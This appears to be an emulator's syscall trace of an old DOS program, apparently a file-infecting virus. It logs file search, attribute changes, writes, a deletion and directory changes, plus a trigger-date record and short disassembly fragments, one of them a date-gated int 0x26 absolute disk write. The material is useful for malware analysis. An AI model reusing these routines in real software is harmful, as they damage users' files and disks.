2018-12-25T11:40:55.446071082Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.447571256Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.449687032Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.450923387Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.452403971Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.454105255Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.45539001Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.457248289Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.458549283Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.459840473Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.462118975Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.463437944Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.464757197Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.466709488Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.468111448Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.469386566Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.471496117Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.4731052Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.474669158Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.476980262Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.478725839Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.480433408Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.483241101Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.484893235Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.487364869Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.492187866Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.493738019Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.495128438Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.49804208Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.499760947Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.502106237Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.50502909Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.506383287Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.508006045Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.510967096Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.512651042Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.514345201Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.51755306Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.519137261Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.521114119Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.523288816Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.524648314Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.529465937Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.531354188Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.532521057Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.535138627Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.536420573Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.537530893Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.539757342Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.541288165Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.542646294Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.545259442Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.546981494Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.548645411Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.550474528Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.551717772Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.553427947Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.554837341Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.556117216Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.558373408Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.559643179Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.56088557Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.562723681Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.563990948Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.565386036Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.567570748Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.568888783Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.570420034Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.572005069Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.573618883Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.575418183Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.576941457Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.578215491Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.580050597Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.581255872Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.582591593Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.584252642Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.585693938Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.587354006Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.588966579Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.590132692Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.591856648Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.593283501Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.594529886Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.596289363Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.59860616Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.600435233Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.602526496Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.604175512Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.607056475Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.608494241Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.610449123Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.612787113Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.614253348Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.616392687Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.618815036Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.620343477Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.621841449Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.624193148Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.626064671Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.627760903Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.629559197Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.631078231Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.633151596Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.634154034Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.635140326Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.63728753Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.638376935Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.639274317Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.640997371Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.642341157Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.644887527Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.647403067Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.649102512Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.65142738Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.652778611Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.654433728Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.657097714Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.658316064Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.659465467Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.661069404Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.662306213Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.663759782Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.665628988Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.667001259Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.66857857Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.670129234Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.671401044Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.673057307Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.674645817Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.675921558Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.677545672Z 64 PC: 12c22 | Write file or device (Write 999 bytes on handle 5)
2018-12-25T11:40:55.686604973Z 87 PC: 12c33 | Get or set file date and time
2018-12-25T11:40:55.687984577Z 62 PC: 12c38 | Close file
2018-12-25T11:40:55.695408747Z 67 PC: 12c46 | Get or set file attributes
2018-12-25T11:40:55.705097263Z 59 PC: 12c4e | Change current directory

{"DateBased":true,"Day":18,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":436,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:40:54.974974202Z 42 PC: 12a62 | Get date 0x12a62: cmp dl, 0x12
0x12a65: jne 0x12a6e
0x12a67: mov cx, 0xae
0x12a6a: mov al, 2
0x12a6c: int 0x26
0x12a6e: popaw
0x12a6f: mov ah, 0x47
0x12a71: mov dl, 0
0x12a73: lea si, word ptr [bp + 0x361]
0x12a77: int 0x21
0x12a79: call 0x12a80
0x12a7c: jmp 0x12aab
0x12a7e: add byte ptr [bx + si], al
0x12a80: pushaw
0x12a81: mov dx, word ptr ds:[bp + 0x13e]
0x12a86: jmp 0x12a8c
0x12a88: mov ah, 0x4c
0x12a8a: int 0x21
0x12a8c: mov cx, 0xae
0x12a8f: lea si, word ptr [bp + 0x16b]
2018-12-25T11:40:54.978209483Z 71 PC: 12a79 | Get current directory
2018-12-25T11:40:54.982020212Z 68 PC: 12aa6 | I/O control for devices (Set for = 'nt ���t��3��ơ}�؎����')
2018-12-25T11:40:54.983993185Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:54.985930194Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:54.98826143Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:54.990195816Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:54.99212194Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:54.994686345Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:54.996565419Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:54.998240662Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.000520513Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.00212236Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.004448096Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.007172815Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.00903462Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.010620889Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.012507864Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.015625684Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.01709824Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.01853226Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.020613296Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.022622351Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.024188533Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.026290883Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.029039844Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.03058146Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.032383363Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.034306049Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.036390206Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.039124171Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.04161314Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.042825691Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.044058179Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.046913704Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.048453801Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.049728478Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.05169275Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.053328189Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.054788912Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.056674415Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.0590661Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.061045355Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.063485041Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.066461491Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.068862203Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.071277473Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.07358458Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.075630632Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.077810056Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.080434541Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.082594882Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.084716917Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.087109049Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.089700307Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.096539036Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.098544966Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.100359031Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.101951214Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.104490304Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.106173408Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.107887974Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.1113162Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.112959494Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.114557605Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.116965991Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.118723666Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.120166968Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.122166186Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.123711866Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.125293913Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.126774859Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.128695012Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.130278951Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.131844934Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.1336762Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.135412536Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.137299581Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.139884396Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.141768335Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.143484053Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.145732641Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.147197874Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.148774606Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.151046404Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.153765719Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.155120219Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.15768643Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.159919098Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.161648265Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.163756331Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.165412532Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.167255207Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.169051782Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.171061881Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.172788347Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.1748159Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.176285984Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.177755239Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.179379374Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.181261125Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.182808038Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.184795146Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.18734101Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.188864013Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.190339255Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.196476365Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.198357985Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.200074593Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.202780833Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.204289582Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.205976711Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.208006184Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.209694279Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.211214768Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.213378215Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.215017475Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.216481345Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.218532911Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.22037397Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.222433795Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.225716963Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.227695661Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.229803129Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.231462444Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.232970064Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.234400586Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.235810977Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.237799524Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.239473472Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.241798286Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.243509354Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.245763365Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.247681561Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.250137303Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.251676663Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.253373452Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.255135856Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.256560268Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.25780786Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.259463496Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.260907932Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.262148689Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.263555736Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.264822835Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.266068194Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.268179171Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.269919894Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.27164623Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.274558181Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.276303297Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.278459815Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.28106127Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.282990784Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.284641682Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.286860633Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.288540808Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.290448991Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.293161694Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.295606055Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.297436543Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.300436696Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.302453246Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.304412484Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.306729364Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.308460764Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.310101937Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.312677031Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.314483519Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.316325197Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.318461219Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.320916139Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.322541045Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.325911337Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.327914291Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.329919912Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.332520168Z 250 PC: 12ab5 | UNKNOWN!
2018-12-25T11:40:55.334170996Z 67 PC: 12aee | Get or set file attributes
2018-12-25T11:40:55.339878206Z 65 PC: 12af2 | Delete file (Filename = '�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�N�S�L�W��M�@�D�!��!�!�!�!�!�!�!�!�!')
2018-12-25T11:40:55.345342655Z 44 PC: 12b0e | Get time 0x12b0e: mov word ptr ds:[bp + 0x13e], dx
0x12b13: jmp 0x12b31
0x12b15: mov ah, 0x3b
0x12b17: lea dx, word ptr [bp + 0x3b3]
0x12b1b: int 0x21
0x12b1d: mov al, byte ptr ds:[bp + 0x3b6]
0x12b22: cmp byte ptr ds:[bp + 0x3b6], 3
0x12b28: je 0x12b88
0x12b2a: inc al
0x12b2c: mov byte ptr ds:[bp + 0x3b6], al
0x12b31: mov ax, 0x4e00
0x12b34: mov cx, 0
0x12b37: lea dx, word ptr [bp + 0x252]
0x12b3b: int 0x21
0x12b3d: jae 0x12b42
0x12b3f: jmp 0x12c46
0x12b42: push 0x4300
0x12b45: pop ax
0x12b46: mov dx, 0x9e
0x12b49: int 0x21
2018-12-25T11:40:55.347682012Z 78 PC: 12b3d | Find first file